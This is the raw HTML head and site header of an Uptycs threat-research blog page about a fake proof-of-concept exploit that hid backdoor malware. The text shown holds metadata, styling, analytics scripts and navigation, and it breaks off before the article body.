<!doctype html><html lang="en"><head>
    <meta charset="utf-8">
    <title>New PoC Exploit Found: Fake Proof of Concept with Backdoor Malware</title>
    <link rel="shortcut icon" href="https://www.uptycs.com/hubfs/uptycs_mark_1C_purple_rgb.png">
    <meta name="description" content="Uptycs reveals how newly discovered fake PoC malware includes a backdoor for data theft, offering strategies for detection, recovery &amp; prevention.">


    
    
    
    
    


    <script src="//cdn.bc0a.com/autopilot/f00000000301697/autopilot_sdk.js" async></script>


    
     

    
    


    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.4/jquery.min.js" integrity="sha512-pumBsjNRGGqkPzKHndZMaAG+bir374sORyzM3uulLV14lN5LyykqNk8eEeUlUkB3U0M4FApyaHraT65ihJhDpQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>


    <!--     <link rel="stylesheet" href="../../assets/vendor/aos/dist/aos.css">
    <script src="../../assets/vendor/aos/dist/aos.js"></script> -->

    <script>

      document.addEventListener('DOMContentLoaded', () => {
        /** init gtm after 3500 seconds - this could be adjusted */
        setTimeout(initGTM, 3500);
      });
      document.addEventListener('scroll', initGTMOnEvent);
      document.addEventListener('mousemove', initGTMOnEvent);
      document.addEventListener('touchstart', initGTMOnEvent);
      function initGTMOnEvent(event) {
        initGTM();
        event.currentTarget.removeEventListener(event.type, initGTMOnEvent); // remove the event listener that got triggered
      }
      function initGTM() {
        if (window.gtmDidInit) {
          return false;
        }
        window.gtmDidInit = true; // flag to ensure script does not get added to DOM more than once.
        const script = document.createElement('script');
        script.type = 'text/javascript';
        script.async = true;
        // ensure PageViews is always tracked (on script load)
        script.onload = () => {
          dataLayer.push({ event: 'gtm.js', 'gtm.start': new Date().getTime(), 'gtm.uniqueEventId': 0 });
        };
        script.src = 'https://www.googletagmanager.com/gtm.js?id=GTM-P663XDQ';
        document.head.appendChild(script);
      }
    </script>    


    <script>
      window.hsConversationsSettings = {
        disableAttachment: true
      };
    </script>

    
    

    
    <meta name="viewport" content="width=device-width, initial-scale=1">

    
    <meta property="og:description" content="Uptycs reveals how newly discovered fake PoC malware includes a backdoor for data theft, offering strategies for detection, recovery &amp; prevention.">
    <meta property="og:title" content="New PoC Exploit Found: Fake Proof of Concept with Backdoor Malware">
    <meta name="twitter:description" content="Uptycs reveals how newly discovered fake PoC malware includes a backdoor for data theft, offering strategies for detection, recovery &amp; prevention.">
    <meta name="twitter:title" content="New PoC Exploit Found: Fake Proof of Concept with Backdoor Malware">

    

    
    <style>
a.cta_button{-moz-box-sizing:content-box !important;-webkit-box-sizing:content-box !important;box-sizing:content-box !important;vertical-align:middle}.hs-breadcrumb-menu{list-style-type:none;margin:0px 0px 0px 0px;padding:0px 0px 0px 0px}.hs-breadcrumb-menu-item{float:left;padding:10px 0px 10px 10px}.hs-breadcrumb-menu-divider:before{content:'›';padding-left:10px}.hs-featured-image-link{border:0}.hs-featured-image{float:right;margin:0 0 20px 20px;max-width:50%}@media (max-width: 568px){.hs-featured-image{float:none;margin:0;width:100%;max-width:100%}}.hs-screen-reader-text{clip:rect(1px, 1px, 1px, 1px);height:1px;overflow:hidden;position:absolute !important;width:1px}
</style>

<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/105237096759/1725517696790/Uptycs_Theme_2023/css/main.css" defer="true">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/169638321455/1727778691677/Uptycs_Theme_2023/css/templates/blog-new.css" defer="true">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/105237648739/1725517692872/Uptycs_Theme_2023/css/theme-overrides.min.css" defer="true">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/118532473678/1725517692765/Uptycs_Theme_2023/css/uptycs-custome-style.min.css" defer="true">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/148558324100/1725517698477/Uptycs_Theme_2023/css/aos/aos.min.css" defer="true">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/template_assets/169533052438/1725517841480/Uptycs_Theme_2023/css/components/_header-new.min.css">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/169053681686/1726032338890/module_169053681686_top-banner.min.css">

<style>
  .UT_announcement_bar.widget_1726026662100 {
    padding-top: 10px;
padding-right: 0px;
padding-bottom: 10px;
padding-left: 0px;

    background: linear-gradient(to right, rgba(146, 101, 235, 1), rgba(146, 232, 251, 1), rgba(146, 232, 251, 1), rgba(210, 255, 82, 1)); 
  }
  .UT_announcement_bar.widget_1726026662100 .UT_announcement_bar-inner {
    padding: 0px 40px;
  }
  .UT_announcement_bar.widget_1726026662100 a.cta_button span {
    font-size: 13px !important;
  }
  .UT_announcement_bar.widget_1726026662100 a.cta_button {
    padding: 0px 1px !important;
    font-size: 13px !important;
    background: transparent !important;
    color: #050314 !important;
    border-bottom: 2px solid #050314 !important;
    border-radius: 0px !important;
    font-weight: 600;
    line-height: 16px !important; 
    font-family: Dazzed !important;
  }
  .UT_announcement_bar.widget_1726026662100 a.cta_button span {
    color: #050314 !important;
  } 
  .UT_announcement_bar.widget_1726026662100 a.cta_button:hover {
    color: #050314 !important;
    border-bottom: 2px solid #050314 !important;
  }
  .UT_announcement_bar a.cta_button:before {
    background: #050314;
  }
  .UT_announcement_bar.widget_1726026662100 .banner-header{
    color: #050314;
    font-size: 13px;
    font-style: normal;
    font-weight: 500;
    line-height: 16px;
  }
  .UT_announcement_bar.widget_1726026662100 {
    position: fixed;
    width: 100%;
    left: 0;
    top: -100%;
    -webkit-transition: all 0.8s ease-in-out;
    transition: all 0.8s ease-in-out;
    z-index: 99999999999;
  }
  .UT_announcement_bar.widget_1726026662100.show-pop {
    top: 0;
    left: 0;
    -webkit-transition: all 0.3s ease-in-out;
    transition: all 0.3s ease-in-out;
  }
  @media only screen and (max-width: 767px){
    .UT_announcement_bar.widget_1726026662100 {
      position: fixed !important;
    }
    .UT_announcement_bar.widget_1726026662100.show-pop { 
      -webkit-transition: all 0.3s ease-in-out;
      transition: all 0.3s ease-in-out;
    }
  }
  body.body-show-pop {
    margin-top: 45.2px;
    -webkit-transition: all 0.3s ease-in-out;
    transition: all 0.3s ease-in-out;
  }
  body.body-show-pop .HeaderTop {
    margin-top: 28.2px;
    -webkit-transition: all 0.3s ease-in-out;
    transition: all 0.3s ease-in-out;
  }  
  body.body-show-pop .header-new.show-pop {
  -webkit-transition: all 0.4s ease-in-out;
    transition: all 0.4s ease-in-out;
  }
  

  /**************iPad Portrait***************/
  @media only screen and ( max-width: 1024px ) and (min-width: 986px){
    .UT_announcement_bar .banner-cta {
      min-width: 120px;
    }
  }
  /********************************************//**************iPad Portrait***************/
  @media only screen and (max-width: 985px) and (min-width: 768px){
    body.body-show-pop {
      margin-top: 45px !important;
    }
    body.body-show-pop .HeaderTop { 
      margin-top: 45px !important;
    } 
    .UT_announcement_bar .banner-cta {
      min-width: 120px;
    }

  }
  /********************************************//**************iPad Portrait***************/
  @media only screen and (max-width: 479px) and (min-width: 220px){
    .UT_announcement_bar .UT_announcement_bar-inner {
      padding: 0px 20px !important;
    }
    body.body-show-pop {
      margin-top: 90px !important;
    }
    body.body-show-pop .HeaderTop { 
      margin-top: 90px !important;
    } 

  }
  /**********************************//***************iPhone Landscape*************/
  @media only screen and (max-width: 767px) and (min-width: 480px){
    body.body-show-pop {
      margin-top: 80px !important;
    }
    body.body-show-pop header.header.menu_header {
      margin-top: 80px;
    } 
    .UT_announcement_bar .cta-banner{ 
      flex-direction: row;
      text-align: center;
    }
    .UT_announcement_bar .banner-header {
      text-align: left;
    }
    .UT_announcement_bar .banner-header {
      margin-bottom: 0px;   
    }

  }

  
  @media only screen and (max-width: 800px) and (min-width: 120px){
    .UT_announcement_bar{
      display: none !important
    }
    

</style>

<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/177030409118/1730182624853/module_177030409118_mega-menu-new.min.css">

<style>
  #hs_cos_wrapper_mega-menu-new .menu .menu__submenu { background-color:rgba(255,255,255,1.0); }

@media (min-width:767px) {
  #hs_cos_wrapper_mega-menu-new .menu__submenu--level-2>.menu__item:first-child:before { background-color:rgba(255,255,255,1.0); }
}

#hs_cos_wrapper_mega-menu-new .menu__submenu .menu__link,
#hs_cos_wrapper_mega-menu-new .menu__submenu .menu__link:hover,
#hs_cos_wrapper_mega-menu-new .menu__submenu .menu__link:focus { background-color:rgba(255,255,255,1.0); }

#hs_cos_wrapper_mega-menu-new .menu__submenu .menu__child-toggle-icon,
#hs_cos_wrapper_mega-menu-new .menu__submenu .menu__child-toggle-icon:hover,
#hs_cos_wrapper_mega-menu-new .menu__submenu .menu__child-toggle-icon:focus {}

</style>


<style>

  .menu--desktop .menu__item--depth-1 .menu__link {
    position: relative;
    display: inline-block;
  }

  .menu--desktop .menu__item--depth-1 .menu__link::after {
    content: '';
    position: absolute;
    bottom: -4px;
    left: 50%;
    height: 3px;
    width: 0;
    background: linear-gradient(90deg, #6910D9 0%, #8AC1F5 51.5%, #BAF473 100%);
    transition: width 0.2s ease, left 0.2s ease;
    transform: translateX(-50%);
  }

  .menu--desktop .menu__item--depth-1 .menu__link:hover::after,
  .menu--desktop .menu__item--depth-1 .menu__link:active::after {
    width: 100%;
    left: 50%;
    transform: translateX(-50%);
  }



  .menu--desktop li.menu__item.menu__item--depth-2 a.menu__link.menu__link--toggle::after{
    content:none;
  }
  /*   .menu--desktop li.menu__item.menu__item--depth-3 a.menu__link.menu__link--toggle::after{
  content:none;
  } */
  .menu--desktop li.menu__item.menu__item--depth-2 a.menu__link.menu__link--toggle::before {
    content: "";
    display: block;
    height:1px;
    width: 82%;
    background-color:#0000002B;
    position: absolute;
    bottom: 0;
    left: 27px;
  }  
  /*   .menu--desktop li.menu__item.menu__item--depth-3 span.menu__link::after{
  content:none;
  } */

  .menu--desktop ul.menu__submenu li.menu__item.menu__item--depth-3 a.menu__link{

  }

  .menu__submenu .menu__item--depth-3 .menu__link:hover:after {
    /* Styles for the link when hovered */
    background-image: url('data:image/svg+xml,%3Csvg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg"%3E%3Cpath fill-rule="evenodd" clip-rule="evenodd" d="M11.7094 7.35358L1 7.35358V6.35358L11.7095 6.35358L7.06299 1.70711L7.77009 1L13.6236 6.85355L7.77009 12.7071L7.06299 12L11.7094 7.35358Z" fill="%23050314"/%3E%3Cpath d="M11.7094 7.35358L11.8862 7.53035L12.313 7.10358H11.7094V7.35358ZM1 7.35358H0.75V7.60358H1L1 7.35358ZM1 6.35358L1 6.10358H0.75V6.35358H1ZM11.7095 6.35358V6.60358H12.313L11.8862 6.1768L11.7095 6.35358ZM7.06299 1.70711L6.88621 1.53033L6.70943 1.70711L6.88621 1.88388L7.06299 1.70711ZM7.77009 1L7.94687 0.823223L7.77009 0.646447L7.59332 0.823223L7.77009 1ZM13.6236 6.85355L13.8004 7.03033L13.9772 6.85355L13.8004 6.67678L13.6236 6.85355ZM7.77009 12.7071L7.59332 12.8839L7.77009 13.0607L7.94687 12.8839L7.77009 12.7071ZM7.06299 12L6.88621 11.8232L6.70943 12L6.88621 12.1768L7.06299 12ZM11.7094 7.10358L1 7.10358L1 7.60358L11.7094 7.60358V7.10358ZM1.25 7.35358V6.35358H0.75V7.35358H1.25ZM1 6.60358L11.7095 6.60358V6.10358L1 6.10358L1 6.60358ZM11.8862 6.1768L7.23977 1.53033L6.88621 1.88388L11.5327 6.53035L11.8862 6.1768ZM7.23977 1.88388L7.94687 1.17678L7.59332 0.823223L6.88621 1.53033L7.23977 1.88388ZM7.59332 1.17678L13.4469 7.03033L13.8004 6.67678L7.94687 0.823223L7.59332 1.17678ZM13.4469 6.67678L7.59332 12.5303L7.94687 12.8839L13.8004 7.03033L13.4469 6.67678ZM7.94687 12.5303L7.23977 11.8232L6.88621 12.1768L7.59332 12.8839L7.94687 12.5303ZM7.23977 12.1768L11.8862 7.53035L11.5326 7.1768L6.88621 11.8232L7.23977 12.1768Z" fill="%236910D9"/%3E%3C/svg%3E');;
    background-size: cover;
    background-position: center; 
    background-repeat: no-repeat; 
    width: 12.624px;
    height: 11.707px;
    position:absolute;
    left: 90%; 
    top: 50%;
    transform: translateY(-50%);
    opacity:1;
  }
  .menu__submenu .menu__item--depth-3 .menu__link:after {
    /* Styles for the link when hovered */
    background-image: url('data:image/svg+xml,%3Csvg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg"%3E%3Cpath fill-rule="evenodd" clip-rule="evenodd" d="M11.7094 7.35358L1 7.35358V6.35358L11.7095 6.35358L7.06299 1.70711L7.77009 1L13.6236 6.85355L7.77009 12.7071L7.06299 12L11.7094 7.35358Z" fill="%23050314"/%3E%3Cpath d="M11.7094 7.35358L11.8862 7.53035L12.313 7.10358H11.7094V7.35358ZM1 7.35358H0.75V7.60358H1L1 7.35358ZM1 6.35358L1 6.10358H0.75V6.35358H1ZM11.7095 6.35358V6.60358H12.313L11.8862 6.1768L11.7095 6.35358ZM7.06299 1.70711L6.88621 1.53033L6.70943 1.70711L6.88621 1.88388L7.06299 1.70711ZM7.77009 1L7.94687 0.823223L7.77009 0.646447L7.59332 0.823223L7.77009 1ZM13.6236 6.85355L13.8004 7.03033L13.9772 6.85355L13.8004 6.67678L13.6236 6.85355ZM7.77009 12.7071L7.59332 12.8839L7.77009 13.0607L7.94687 12.8839L7.77009 12.7071ZM7.06299 12L6.88621 11.8232L6.70943 12L6.88621 12.1768L7.06299 12ZM11.7094 7.10358L1 7.10358L1 7.60358L11.7094 7.60358V7.10358ZM1.25 7.35358V6.35358H0.75V7.35358H1.25ZM1 6.60358L11.7095 6.60358V6.10358L1 6.10358L1 6.60358ZM11.8862 6.1768L7.23977 1.53033L6.88621 1.88388L11.5327 6.53035L11.8862 6.1768ZM7.23977 1.88388L7.94687 1.17678L7.59332 0.823223L6.88621 1.53033L7.23977 1.88388ZM7.59332 1.17678L13.4469 7.03033L13.8004 6.67678L7.94687 0.823223L7.59332 1.17678ZM13.4469 6.67678L7.59332 12.5303L7.94687 12.8839L13.8004 7.03033L13.4469 6.67678ZM7.94687 12.5303L7.23977 11.8232L6.88621 12.1768L7.59332 12.8839L7.94687 12.5303ZM7.23977 12.1768L11.8862 7.53035L11.5326 7.1768L6.88621 11.8232L7.23977 12.1768Z" fill="%236910D9"/%3E%3C/svg%3E');;
    background-size: cover;
    background-position: center; 
    background-repeat: no-repeat; 
    width: 12.624px;
    height: 11.707px;
    position:absolute;
    left: 85%; 
    top: 50%;
    transform: translateY(-50%);
    opacity:0;
  }
  .menu__submenu .menu__item--depth-3 .menu__link {
    transition: width 0.2s ease, left 0.2s ease;
  }
  .menu__submenu .menu__item--depth-3 .menu__link{
    position:relative;
    /*     display: flex;
    align-items: center; 
    padding-right: 20px;  */
  }
</style>

<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/169623459881/1725336440608/module_169623459881_header-cta.min.css">

<style>
.header-cta-outer .demo-cta a:hover{
  background-color: #9de70a;
  border: 1px solid #9de70a;
  }
  .header-cta-outer .log-cta a:hover{
  color:#5c5b5f
  }
</style>

<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/169635189857/1733456835608/module_169635189857_blog-article-header.min.css">

<style>
  .blog-poster-header .post-tags-mobile::before{
    content:url("");
    background-image:url(https://www.uptycs.com/hubfs/Vector%202.svg);
    background-position:center; 
    background-size: auto;
    background-repeat: no-repeat;
    width:2px;
    height:18px;
    position: absolute;
    top: 12px;
    left: -12px;
  }
</style>

<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/170041160857/1725516579135/module_170041160857_sidebar-popup-cta.min.css">

<style>
  @media only screen and (max-width: 767px) and (min-width: 220px){
    .report-popup-section .actions::before{
      right: 90px;
    }

  }
</style>

<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/169940550668/1733491051049/module_169940550668_table-of-content.min.css">
<link rel="stylesheet" href="https://www.uptycs.com/hs-fs/hub/2617658/hub_generated/module_assets/174733485380/1729060694808/module_174733485380_Footer_New_2024.min.css">

<style>
  #hs_cos_wrapper_widget_1722594192479 .TwoMenuLinks {
  padding-right:22px;
  width:17%;
}

#hs_cos_wrapper_widget_1722594192479 .Footer_Links { width:75%; }

#hs_cos_wrapper_widget_1722594192479 .Footer {
  display:inline-block;
  width:100%;
}

#hs_cos_wrapper_widget_1722594192479 .Attack_Surfaces h6 {
  margin-bottom:8px;
  margin-top:20px;
  color:#9b54f8;
}

#hs_cos_wrapper_widget_1722594192479 .footer_pre_copy {
  margin-bottom:0;
  padding-top:0;
  text-align:left !important;
  width:24.1%;
}

#hs_cos_wrapper_widget_1722594192479 .footer_icons_new { margin:10px 0; }

#hs_cos_wrapper_widget_1722594192479 .mobile_parter { display:none; }

@media all and (max-width:1024px) {
  #hs_cos_wrapper_widget_1722594192479 .TwoMenuLinks {
    padding-right:35px;
    width:45%;
    display:block;
  }

  #hs_cos_wrapper_widget_1722594192479 .FServices_Links {
    padding-left:0;
    padding-right:25px;
    width:100%;
  }

  #hs_cos_wrapper_widget_1722594192479 .Attack_Surfaces,
  #hs_cos_wrapper_widget_1722594192479 .Use_Case { width:100%; }

  #hs_cos_wrapper_widget_1722594192479 footer.footer.footer_new .Footer_SocialMedia { padding-bottom:0px; }
}

@media all and (max-width:767px) {
  #hs_cos_wrapper_widget_1722594192479 .footer_pre_copy { width:100%; }

  #hs_cos_wrapper_widget_1722594192479 .Footer_Links { width:100%; }

  #hs_cos_wrapper_widget_1722594192479 .footer_icons_new {
    height:50px !important;
    width:auto;
  }

  #hs_cos_wrapper_widget_1722594192479 .Footer_SocialMedia {
    float:left;
    width:100%;
  }

  #hs_cos_wrapper_widget_1722594192479 .footer_pre_copy { display:none; }

  #hs_cos_wrapper_widget_1722594192479 .footer_pre_copy.mobile_parter { display:block !important; }

  #hs_cos_wrapper_widget_1722594192479 .TwoMenuLinks {
    padding-right:25px;
    width:45%;
  }
}

@media all and (max-width:640px) {
  #hs_cos_wrapper_widget_1722594192479 .TwoMenuLinks {
    padding-right:0px;
    display:block;
    margin-top:0;
  }

  #hs_cos_wrapper_widget_1722594192479 .Attack_Surfaces h6 {
    margin-bottom:7px;
    font-size:14px;
  }

  #hs_cos_wrapper_widget_1722594192479 .FPartners_Links,
  #hs_cos_wrapper_widget_1722594192479 .FServices_Links {
    margin-top:0;
    padding-top:0;
  }

  #hs_cos_wrapper_widget_1722594192479 .Footer_Links ul li { padding:0 0 5px; }

  #hs_cos_wrapper_widget_1722594192479 .Footer_Links ul li a { font-size:12px; }

  #hs_cos_wrapper_widget_1722594192479 .Footer h5 { margin-bottom:10px; }

  #hs_cos_wrapper_widget_1722594192479 .TwoMenuLinks {
    padding-right:25px;
    width:45%;
  }
}

</style>

<style>
</style>

<!-- Editor Styles -->
<style id="hs_editor_style" type="text/css">
.header-top-row-0-force-full-width-section > .row-fluid {
  max-width: none !important;
}
/* HubSpot Styles (default) */
.header-top-row-0-padding {
  padding-top: 0px !important;
  padding-bottom: 0px !important;
}
</style>
    <script type="application/ld+json">
{
  "mainEntityOfPage" : {
    "@type" : "WebPage",
    "@id" : "https://www.uptycs.com/blog/threat-research-report-team/new-poc-exploit-backdoor-malware"
  },
  "author" : {
    "name" : "Uptycs Threat Research",
    "url" : "https://www.uptycs.com/blog/threat-research-report-team/author/uptycs-threat-research",
    "@type" : "Person"
  },
  "headline" : "New PoC Exploit Found: Fake Proof of Concept with Backdoor Malware",
  "datePublished" : "2023-07-12T12:00:00.000Z",
  "dateModified" : "2024-08-14T10:20:42.104Z",
  "publisher" : {
    "name" : "Uptycs",
    "logo" : {
      "url" : "https://2617658.fs1.hubspotusercontent-na1.net/hubfs/2617658/Uptycs%20Logos%202022/uptycs_logo_2C_on-light_rgb.png",
      "@type" : "ImageObject"
    },
    "@type" : "Organization"
  },
  "@context" : "https://schema.org",
  "@type" : "BlogPosting",
  "image" : [ "https://www.uptycs.com/hubfs/POC%20door.jpg" ]
}
</script>


    
<!--  Added by GoogleAnalytics integration -->
<script>
var _hsp = window._hsp = window._hsp || [];
_hsp.push(['addPrivacyConsentListener', function(consent) { if (consent.allowed || (consent.categories && consent.categories.analytics)) {
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create','UA-117543321-1','auto');
  ga('send','pageview');
}}]);
</script>

<!-- /Added by GoogleAnalytics integration -->

<!--  Added by GoogleAnalytics4 integration -->
<script>
var _hsp = window._hsp = window._hsp || [];
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}

var useGoogleConsentModeV2 = true;
var waitForUpdateMillis = 1000;


if (!window._hsGoogleConsentRunOnce) {
  window._hsGoogleConsentRunOnce = true;

  gtag('consent', 'default', {
    'ad_storage': 'denied',
    'analytics_storage': 'denied',
    'ad_user_data': 'denied',
    'ad_personalization': 'denied',
    'wait_for_update': waitForUpdateMillis
  });

  if (useGoogleConsentModeV2) {
    _hsp.push(['useGoogleConsentModeV2'])
  } else {
    _hsp.push(['addPrivacyConsentListener', function(consent){
      var hasAnalyticsConsent = consent && (consent.allowed || (consent.categories && consent.categories.analytics));
      var hasAdsConsent = consent && (consent.allowed || (consent.categories && consent.categories.advertisement));

      gtag('consent', 'update', {
        'ad_storage': hasAdsConsent ? 'granted' : 'denied',
        'analytics_storage': hasAnalyticsConsent ? 'granted' : 'denied',
        'ad_user_data': hasAdsConsent ? 'granted' : 'denied',
        'ad_personalization': hasAdsConsent ? 'granted' : 'denied'
      });
    }]);
  }
}

gtag('js', new Date());
gtag('set', 'developer_id.dZTQ1Zm', true);
gtag('config', 'G-FM1R8N7KP8');
</script>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-FM1R8N7KP8"></script>

<!-- /Added by GoogleAnalytics4 integration -->

<!--  Added by GoogleTagManager integration -->
<script>
var _hsp = window._hsp = window._hsp || [];
window.dataLayer = window.dataLayer || [];
function gtag(){dataLayer.push(arguments);}

var useGoogleConsentModeV2 = true;
var waitForUpdateMillis = 1000;



var hsLoadGtm = function loadGtm() {
    if(window._hsGtmLoadOnce) {
      return;
    }

    if (useGoogleConsentModeV2) {

      gtag('set','developer_id.dZTQ1Zm',true);

      gtag('consent', 'default', {
      'ad_storage': 'denied',
      'analytics_storage': 'denied',
      'ad_user_data': 'denied',
      'ad_personalization': 'denied',
      'wait_for_update': waitForUpdateMillis
      });

      _hsp.push(['useGoogleConsentModeV2'])
    }

    (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
    new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
    j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
    'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
    })(window,document,'script','dataLayer','GTM-P663XDQ');

    window._hsGtmLoadOnce = true;
};

_hsp.push(['addPrivacyConsentListener', function(consent){
  if(consent.allowed || (consent.categories && consent.categories.analytics)){
    hsLoadGtm();
  }
}]);

</script>

<!-- /Added by GoogleTagManager integration -->



<link rel="amphtml" href="https://www.uptycs.com/blog/threat-research-report-team/new-poc-exploit-backdoor-malware?hs_amp=true">

<meta property="og:image" content="https://www.uptycs.com/hubfs/POC%20door.jpg">
<meta property="og:image:width" content="1200">
<meta property="og:image:height" content="627">
<meta property="og:image:alt" content="Read the blog from Uptycs Threat Research team about fake PoC malware with a backdoor allowing data theft.">
<meta name="twitter:image" content="https://www.uptycs.com/hubfs/POC%20door.jpg">
<meta name="twitter:image:alt" content="Read the blog from Uptycs Threat Research team about fake PoC malware with a backdoor allowing data theft.">

<meta property="og:url" content="https://www.uptycs.com/blog/threat-research-report-team/new-poc-exploit-backdoor-malware">
<meta name="twitter:card" content="summary_large_image">

<link rel="canonical" href="https://www.uptycs.com/blog/threat-research-report-team/new-poc-exploit-backdoor-malware">

<meta property="og:type" content="article">
<link rel="alternate" type="application/rss+xml" href="https://www.uptycs.com/blog/threat-research-report-team/rss.xml">
<meta name="twitter:domain" content="www.uptycs.com">
<script src="//platform.linkedin.com/in.js" type="text/javascript">
    lang: en_US
</script>

<meta http-equiv="content-language" content="en">






    

  <meta name="generator" content="HubSpot"></head>

  <body class="  hs-content-id-124199424638 hs-blog-post hs-blog-id-174984884320 light-background">
<!--  Added by GoogleTagManager integration -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-P663XDQ" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>

<!-- /Added by GoogleTagManager integration -->

    <div class="body-wrapper   hs-content-id-124199424638 hs-blog-post hs-blog-id-174984884320">
      
      


      <div data-global-resource-path="Uptycs_Theme_2023/templates/partials/mega-menu-new.html">


<header class="header header-new ">
  <div class="HeaderTop text-center"><div class="wrapper"></div></div>
  <div class="header-inner wrapper">
    
    <a href="#main-content" class="header__skip">Skip to content</a>

    

    <div class="container-fluid content-wrapper">
<div class="row-fluid-wrapper">
<div class="row-fluid">
<div class="span12 widget-span widget-type-cell " style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-1 dnd-section header-top-row-0-padding header-top-row-0-force-full-width-section">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-cell dnd-column" style="" data-widget-type="cell" data-x="0" data-w="12">

<div class="row-fluid-wrapper row-depth-1 row-number-2 dnd-row">
<div class="row-fluid ">
<div class="span12 widget-span widget-type-custom_widget dnd-module" style="" data-widget-type="custom_widget" data-x="0" data-w="12">
<div id="hs_cos_wrapper_widget_1726026662100" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module"><section class="UT_announcement_bar widget_1726026662100" style="">
  <div class="UT_announcement_bar-inner">  
    <div class="cta-banner">
      <div class="banner-header">
        Building Trusted Development Pipelines Through Image Policy and Enforcement
      </div>
      
      <div class="banner-cta">
        <span id="hs_cos_wrapper_widget_1726026662100_" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_cta" style="" data-hs-cos-general-type="widget" data-hs-cos-type="cta"><!--HubSpot Call-to-Action Code --><span class="hs-cta-wrapper" id="hs-cta-wrapper-be3c8cee-be42-451a-83e8-ee258483ed4e"><span class="hs-cta-node hs-cta-be3c8cee-be42-451a-83e8-ee258483ed4e" id="hs-cta-be3c8cee-be42-451a-83e8-ee258483ed4e"><!--[if lte IE 8]><div id="hs-cta-ie-element"></div><![endif]--><a href="https://cta-redirect.hubspot.com/cta/redirect/2617658/be3c8cee-be42-451a-83e8-ee258483ed4e" target="_blank" rel="noopener"><img class="hs-cta-img" id="hs-cta-img-be3c8cee-be42-451a-83e8-ee258483ed4e" style="border-width:0px;" src="https://no-cache.hubspot.com/cta/default/2617658/be3c8cee-be42-451a-83e8-ee258483ed4e.png" alt="Learn More"></a></span><script charset="utf-8" src="/hs/cta/cta/current.js"></script><script type="text/javascript"> hbspt.cta._relativeUrls=true;hbspt.cta.load(2617658, 'be3c8cee-be42-451a-83e8-ee258483ed4e', {"useNewLoader":"true","region":"na1"}); </script></span><!-- end HubSpot Call-to-Action Code --></span>
      </div>
      
    </div>
    <span class="close">
      <svg xmlns="http://www.w3.org/2000/svg" width="14" height="14" viewbox="0 0 14 14" fill="none">
        <path d="M13 1L1 13" stroke="#050314" />
        <path d="M13 13L1 0.999999" stroke="#050314" />
      </svg>
    </span>
  </div>
</section> 

 


 

</div>

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div>
</div>
</div>

    

    <div class="header__container content-wrapper">

      

      <div class="header__logo header__logo--main">
        <div id="hs_cos_wrapper_site_logo" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module widget-type-logo" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module">
  





  <span id="hs_cos_wrapper_site_logo_hs_logo_widget" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_logo" style="" data-hs-cos-general-type="widget" data-hs-cos-type="logo"><a href="https://www.uptycs.com/" id="hs-link-site_logo_hs_logo_widget" style="border-width:0px;border:0px;"><img src="https://www.uptycs.com/hubfs/uptycs_logo_2C_on-light_rgb-1.svg" class="hs-image-widget " height="36" style="height: auto;width:120px;border-width:0px;border:0px;" width="120" alt="Uptycs" title="Uptycs"></a></span>
</div>
      </div>

      
      <div class="header__column">
        
        <div class="header__row-1">
          <div class="header--toggle header__navigation--toggle"></div>

          <div class="header__close--toggle"></div>

          <div class="header__navigation header--element">
            <div class="menu mega-menu-header">
              
              <div id="hs_cos_wrapper_mega-menu-new" class="hs_cos_wrapper hs_cos_wrapper_widget hs_cos_wrapper_type_module" style="" data-hs-cos-general-type="widget" data-hs-cos-type="module">







	
 

<nav class="menu menu--desktop mega-menu-top">
  <ul class="menu__wrapper no-list mega-menu">
    
    <li class="menu__item menu__item--has-submenux ">
    <a class="menu__link top-menu-link " href="">
      Platform
    </a>
      
      <ul class="sub-menu">
        
        <li class="submenu-box">
          
